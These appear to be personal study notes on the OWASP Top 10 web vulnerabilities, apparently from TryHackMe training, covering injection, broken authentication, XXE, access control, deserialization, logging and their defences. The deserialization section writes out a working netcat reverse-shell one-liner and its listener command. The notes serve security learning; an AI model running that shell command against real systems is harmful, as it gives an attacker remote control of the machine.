Open Web Application Security Project Top 10

1 - Injection

User input is handled as actual commands or code. Common examples:

• SQL injection
• Command injection
  • Cross-site scripting
• OS command injection
  • webserver makes system call on host machine like whoami
  • attacker spawning reverse shell

Defending

• Allow list: only execute pre allowed commands
• Stripping input: removing dangerous symbols from the input

2 - Broken Authentication

Common examples:

• Brute Force Attacks
• Exploit weak credentials
• Weak Session Cookies

Defending

• Strong password policy
• Block bruteforce attacks
  • lock accounts after many incorrect attempts
  • use recapta
  • block bruteforce ip addresses
• Multi Factor Authenticathion / 2fa

3 - Sensitive Data Exposure

Webserver accidentally exposes sensitive data e.g. customer names, orders, credit cards, passwords etc. Examples:

• Something wrong in assets folder

4 - XML External Entity (XXE)

Vulnerability that abuses features of XML parsers/data. Possible abuses:

• File access
• DDoS
• Server-Side Request Forgety (SSRF)
• Port scanning
• remote code execution

What is XML?

eXtensible Markup Language is used to store and transport data between various systems and languages.

Two Types of XXE

in-band XXE

Immediate response

out-of-band XXE (blind XXE)

No immediate response. Hacker must use payload to answer to other file or server

5 - Broken Access Control

User is able to load pages that they should not have access. Common examples:

• users are not properly verified when requesting private info such as account page e.g. they modify request like ?account=admin.
• fuffing or similar page lookup
• IDOR - Insecure Direct Onject Reference
  • /profile?account=1337 < could show account details that we don’t have access

6 - Security Misconfiguration

includes:

• default credentials
• unnecessary features enabled
• overly detailed error messages
• HTTP security headers
• missconfigured cloud services

7 - Cross-site Scripting

Inject script on website to execute it by server (reflected) or other users (stored) << not quite like that // TODO: refactor @see XSS

8 - Insecure Deserialization

Simply, insecure deserialization is replacing data processed by an application with malicious code.

(De)serialization

Serialisation is the process of converting objects into simpler format (e.g. binary) for transmitting between systems.

Deserialization is the reverse of serialization.

Spawning reverse shell

Target Machine: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f Attack Machine: ‘nc -lvnp 4444’

9 - Components with Known Vulnerabilities

https://www.exploit-db.com/

Meaning that website framework or other components have known vulnerabilities. These can be abused easily for example spawning remote shell.

10 - Insufficient Logging & Monitoring

Logging

Logging is essential. In case of incident, we must be able to trace attackers actions.

Logging should contain at least: - HTTP status codes - Time stamps - usernames - API endpoints or pages - IP addresses

Note! Logs must be stored securely and follow GDPR and other privacy laws.

Monitoring

With automated monitoring we can stop attacker before breach or incident. - multiple false logging actions or other unauthorized attempts. - anomalous IP addresses - detect automated tools - speed of requests - user-agent - common payloads - honey pots - xss attempts - SQLi attempts

Monitoring alone is not enough, we need to take actions on detected abuses. Firewall can be used for this for example.